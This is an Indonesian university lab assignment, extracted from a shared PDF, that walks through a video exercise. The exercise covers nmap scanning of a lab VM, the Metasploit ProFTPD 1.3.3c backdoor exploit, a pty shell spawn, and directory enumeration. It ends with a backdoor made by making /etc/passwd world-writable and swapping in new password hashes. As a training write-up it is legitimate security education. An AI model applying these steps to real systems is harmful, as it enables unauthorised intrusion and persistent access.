Anda di halaman 1dari 9

School of Electrical Engineering

Telkom University

----- Jawablah pertanyaan berikut dengan seksama -----

Dari video yang sudah anda tonton dan pelajari, jawablah


pertanyaan dibawah ini! a. Dari video yang sudah anda pelajari,
isilah tabel berikut.
IP address attacker 192.168.56.101
(IPv4)
Subnet mask attacker 255.255.255.0
IP broadcast attacker 192.168.56.255
IP address attacker 0:0:0:0:0:ffff:c0a8:3865
(Ipv6)
mac address 08:00:27:14:06:50

b. Apa tujuan attacker melakukan Nmap -AT4 <ip address> ?


Jawab :
Tujuan attacker melakukan itu adalah untuk mengetahui port mana
saja yang terbuka dan jumlah port yang tertutup, mengetahui service
dari port-port mana yang terbuka, dan mengetahui version dari masing-
masing service, serta dapat mengetahui berapa lama waktu saat
melakukan scanning.
School of Electrical Engineering
Telkom University

c. Dari hasil scanning nmap -AT4 192.168.56.101, ada berapa port yang
terbuka? Sebutkan port-port tersebut beserta servicenya!
Jawab :
Port State Service Version
21/tcp Open ftp ProFTPD 1.3.3c
22/tcp Open ssh OpenSSH 7.2p2 Ubuntu
4ubuntu2.2
(Ubuntu Linux; protocol 2.0)

80/tcp Open ssl/http Apache httpd2.4.18 ((Ubuntu))

d. Port mana yang menjadi target


penyerangan attacker? Jawab :
Port yang menjadi target penyerangan adalah port 21/tcp dengan
status open dan port tersebut memiliki service ftp yang menggunakan
versi ProFTPD 1.3.3c
School of Electrical Engineering
Telkom University

e. Bagaimana cara attacker melakukan


eksploitasi? Jawab :

• Attacker masuk ke dalam menu msfconsole yang telah terfitur


Metasploit untuk membantu proses penyerangan

• Attacker mencari version dari port tersebut, yaitu ProFTPD 1.3.3c


dengan bantuan command “ search ProFTPD 1.3.3c “

• Attacker melakukan penyerangan/eksploitasi dengan menggunakan


teknik Backdoor dengan bantuan command “ use exploit/unix/ftp/
proftpd_133c_backdoor “

• Ketika attacker sudah masuk ke dalam version tersebut, kemudian


melakukan set remote IP dengan command “ set rhost
192.168.56.101 “

• Attacker sudah mendapatkan akses atau melakukan eksploitasi dan


mengupdate password lama menjadi password baru yaitu
kamjarmantab
School of Electrical Engineering
Telkom University

• Attacker masuk ke menu Home:ping dan masuk ke dalam ssh


marlinspike yang sebelumnya passwordnya telah diganti dengan
command “ ssh marlinspike@192.168.56.101 “
• Attacker mengetahui identitas dari ssh marlinspike dengan
command “ id “

• Attacker menjalankan perintah sudo su dan masukkan password dari


akun marlinspike yang sudah diatur sebelumnya yaitu
kamjarmantab

• Attacker kemudian masuk ke root dari si marlinspike, ketika sudah


masuk lalu attacker membuka web browser mozilla firefox dengan
mengetikan IP
192.168.56.101 tunggu hingga muncul tulisan “It Works!” pada layer
browser

• Attacker masuk ke dalam menu …@farnetwork /opt/dirb dan


mengetikkan command “ ./dirb ‘http://192.168.56.101’ “
School of Electrical Engineering
Telkom University

• Setelah berhasil masuk, attacker mencari DIRECTORY:


http://192.168.56.101/secret/ dan mengakses directory tersebut
melalui Mozilla Firefox lalu muncul “My secret Blog”
• Attacker kembali ke terminal pada menu Home: nmap untuk
menjalankan command
“ sudo nano /etc/hosts “
• Attacker menambahkan modified yaitu 192.168.56.101 vtcsec dan
pilih yes untuk menyimpan
• Masuk ke halaman Mozilla Firefox, ketik vtcsec/secret/. Lalu muncul
tampilan dari My Secret Blog yang baru

• Masuk kemenu log in pada laman blog tersebut lalu masukkan


username dan password
• Attacker berhasil melakukan eksploitasi atau masuk ke dalam
sistem.
School of Electrical Engineering
Telkom University

f. Bagaimana cara attacker membuat


backdoor? Jawab :

• Setelah attacker berhasil masuk ke dalam sistem, attacker


kembali ke msfconsole dengan menjalankan command “ shell “
pada root-nya yang berubah menjadi meterpreter kode yang
digunakan untuk membuka port-port yang berbahaya

• Attacker kembali menyalin command “ python -c ‘import pty;


pty spawn (“/bin/bash”)’ “ yang ada dalam menu kamjar pada
menu msfconsole

• Attacker lalu menjalankan


command : www-
data@vtcsec : ~$ id www-
data@vtcsec : ~$ sudo su
www-data@vtcsec : $ cd/etc
www-data@vtcsec : /etc$
cat passwd www-
data@vtcsec : /etc$ ls –l
passwd
School of Electrical Engineering
Telkom University

root@vtcsec :/home/marlinspike# chmod o+w /etc/passwd


• Attacker masuk ke dalam menu …ec/home/marlinspike,
menjalankan command
“ chmod “ dan “ o+w/etc/password “
• Kembali ke menu kamjar dan attacker menghapus password:
kambuh
• Menuju halaman Home: nano, attacker menjalankan command “
mkpassswd -5
kamjar “ kemudian muncul informasi yang akan disalin ke
password: kambuh yang telah dihapus sebelumnya

• Attacker kemudian menyalin password yang telah diubah


tersebut ke dalam menu msfconsole

• Attacker menjalankan command “ cat password “ untuk


memunculkan password yang telah diubah sebelumnya
• Menjalankan command “ id “ dan menjalankan perintah “ su “
School of Electrical Engineering
Telkom University

• Attacker memasukkan password kamjar

• Menjalankan command “ id “ dan memasukkan password


marlinspike, kemudian mengubah password menjadi kamjar

• Menuju menu …ec:/home/marlinspike dan attacker


menjalankan command “ exit “ sebanyak 2x untuk keluar

• Kemudian, menjalankan command “ ssh


marlinspike@192.168.56.101 “ dan masukkan password
yang sudah dibuat
• Menjalankan command “ id “ lalu menjalankan perintah “ sudo
su “

• Memasukkan password untuk akun marlinspike, lalu keluar


dengan command “ exit “
• Menjalankan command “ su “ dan memasukkan password yang
sudah ada
• Penyerang berhasil melakukan teknik penyerangan backdoor.

Anda mungkin juga menyukai